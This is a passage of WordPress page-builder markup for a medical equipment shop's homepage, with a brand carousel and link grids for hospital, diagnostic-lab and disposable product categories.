images=”3933,3934,3935,3936,4233,4222,4219,4216,4203,4211,4200,4195,4129,4104,4105,4103,4100,4099,4098,4097,4095,4093,4090,4088,4083,4079,4063,4060,4057,4056,4046,4041,4029,4023,3985,3978,4068,3924,3799,3819,3783,3782,3436,3439,3649,2986,2985,2984,2983,2974″ onclick=”custom_link” custom_links_target=”_blank” slides_per_view=”12″ autoplay=”yes” css=”.vc_custom_1626533631313{background-color: #23dbdb !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;border-radius: 4px !important;}” custom_links=”#E-8_aHR0cHMlM0ElMkYlMkZhdmFubWVkaWJhemFyLmNvbSUyRnByb2R1Y3QtY2F0ZWdvcnklMkZhbGwtYnJhbmRzJTJG”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Hospital Supplies And Surgical Products” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623303133064{border-radius: 5px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c72a6fe041e\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/anesthesia\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/anesthesia\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Anesthesia<\/a><\/div>[vc_single_image image=”4461″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/anesthesia\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c72dc78fb57\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/autoclave\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/autoclave\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Autoclave<\/a><\/div>[vc_single_image image=”4465″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/autoclave\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c731318ef74\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/baby-warmer-incubator\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/baby-warmer-incubator\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Baby Warmer\/Incubator<\/a><\/div>[vc_single_image image=”4468″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/baby-warmer-incubator\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cef5455bca1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/c-arm-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/c-arm-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">C-Arm Machine<\/a><\/div>[vc_single_image image=”4473″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/c-arm-machine\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c7365eb96c4\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/defibrillator-aed\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/defibrillator-aed\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Defibrillator \/ AED<\/a><\/div>[vc_single_image image=”4477″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/defibrillator-aed\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c73a9428d23\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diathermy\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diathermy\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diathermy<\/a><\/div>[vc_single_image image=”4481″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diathermy\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c73d011eeb1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/12-channel-ecg\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/12-channel-ecg\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">12-Channel ECG<\/a><\/div>[vc_single_image image=”4486″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/12-channel-ecg\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c73f6275ba8\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/eeg\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/eeg\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">EEG<\/a><\/div>[vc_single_image image=”4491″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/eeg\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c7428351181\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/endoscopy-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/endoscopy-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Endoscopy Machine<\/a><\/div>[vc_single_image image=”4497″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/endoscopy-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cef5e69681f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/video-colposcopy\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/video-colposcopy\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Video Colnoscopy<\/a><\/div>[vc_single_image image=”4501″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/video-colposcopy\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c748be27f92\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ett-tmt\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ett-tmt\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ETT \/ TMT<\/a><\/div>[vc_single_image image=”4505″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ett-tmt\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c74b9804d70\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/fetal-doppler\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/fetal-doppler\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Fetal Doppler<\/a><\/div>[vc_single_image image=”4510″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/fetal-doppler\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c74f63c25fb\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/hemodialysis-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/hemodialysis-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Hemodialysis Machine<\/a><\/div>[vc_single_image image=”4514″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/hemodialysis-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c7516c6df52\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/holter\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/holter\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Holter<\/a><\/div>[vc_single_image image=”4518″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/holter\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c754a637a3e\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/laparoscopy\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/laparoscopy\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Laparoscopy<\/a><\/div>[vc_single_image image=”4528″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/laparoscopy\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c756f08f630\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/operating-table\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/operating-table\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Operating Table<\/a><\/div>[vc_single_image image=”4526″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/operating-table\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c75aac82b16\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/led-ot-light\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/led-ot-light\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">LED OT Light<\/a><\/div>[vc_single_image image=”4532″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/led-ot-light\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c75dad839b7\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Oxygen Concentrator<\/a><\/div>[vc_single_image image=”4536″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c7618a3488a\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/patient-monitor\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/patient-monitor\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Patient Monitor<\/a><\/div>[vc_single_image image=”4540″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/patient-monitor\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c766352f6f5\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/spirometry\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/spirometry\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">SPIROMETRY<\/a><\/div>[vc_single_image image=”4545″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/spirometry\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c772970b1ab\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Ultrasound Machine<\/a><\/div>[vc_single_image image=”4554″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ultrasound-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cef693a74df\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/uroflowmeter\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/uroflowmeter\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Uroflowmeter<\/a><\/div>[vc_single_image image=”4558″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/uroflowmeter\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c8447fc8d8e\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ventilator\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ventilator\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ICU Ventilator<\/a><\/div>[vc_single_image image=”4562″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ventilator\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c84668c9908\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/x-ray-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/x-ray-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">X-Ray Machine<\/a><\/div>[vc_single_image image=”4563″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/x-ray-machine\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Diagnostic And Laboratory Equipment & Accessories” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4e6c25911b\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/hematology-analyzer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/hematology-analyzer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Hematology Analyzer<\/a><\/div>[vc_single_image image=”4388″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/hematology-analyzer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4f7dbb4ef8\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/esr-analyser\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/esr-analyser\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ESR Analyzer<\/a><\/div>[vc_single_image image=”4403″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/esr-analyser\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4f87abf79d\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/electrolyte-blood-gas-analyzer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/electrolyte-blood-gas-analyzer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Electrolyte Analyzer<\/a><\/div>[vc_single_image image=”4407″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/electrolyte-blood-gas-analyzer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4f83d2a366\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/biochemistry-analyzer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/biochemistry-analyzer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Bio-Chemistry analyzer<\/a><\/div>[vc_single_image image=”4405″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/biochemistry-analyzer\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4f8e089738\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/harmone-analyzer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/harmone-analyzer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Harmone Analyzer<\/a><\/div>[vc_single_image image=”4409″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/harmone-analyzer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4f9f9b6f62\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/coagulation-analyzer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/coagulation-analyzer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Coagulation Analyzer<\/a><\/div>[vc_single_image image=”4413″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/coagulation-analyzer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4fb9c6c266\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/spectophotometer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/spectophotometer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Spectrophotometer<\/a><\/div>[vc_single_image image=”4411″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/spectophotometer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c4ff3663e40\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diagnostic-laboratory-products\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diagnostic-laboratory-products\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Lab Incubator<\/a><\/div>[vc_single_image image=”4419″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/lab-incubator\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css=”.vc_custom_1621842235285{padding-bottom: 50px !important;}” mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_gradient_switch=”no” row_reverse_mobile=”0″ row_reverse_tablet=”0″ woodmart_disable_overflow=”0″][vc_column][vc_row_inner][vc_column_inner][vc_btn title=”Medical Disposables And Accessories” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623780430156{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd9fdb9c777\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ppe\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">DISPOSABLES<\/a><\/div>[vc_single_image image=”4775″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/ppe\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cda2b30510d\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ACCESSORIES<\/a><\/div>[vc_single_image image=”4782″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/medical-accessorries\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdec158050d\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ECG ACCESSORIES<\/a><\/div>[vc_single_image image=”4783″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ecg-accessories\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdecf58e077\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ULTRASOUND ACCESSORIE<\/a><\/div>[vc_single_image image=”4784″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/ultrasound-accessories\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdedf0e01ff\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ct-mri-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ct-mri-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">CT\/MRI ACCESSORIES<\/a><\/div>[vc_single_image image=”4785″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/ct-mri-accessories\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdef5e0eacd\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/medical-dress-hospital-cloths\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/medical-dress-hospital-cloths\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">MEDICAL DRESS\/HOSPITAL CLOTHS<\/a><\/div>[vc_single_image image=”4787″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/medical-dress-hospital-cloths\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cdf063665e0\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/surgical-accessories\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/surgical-accessories\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">SURGICAL ACCESSORIES<\/a><\/div>[vc_single_image image=”4788″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” 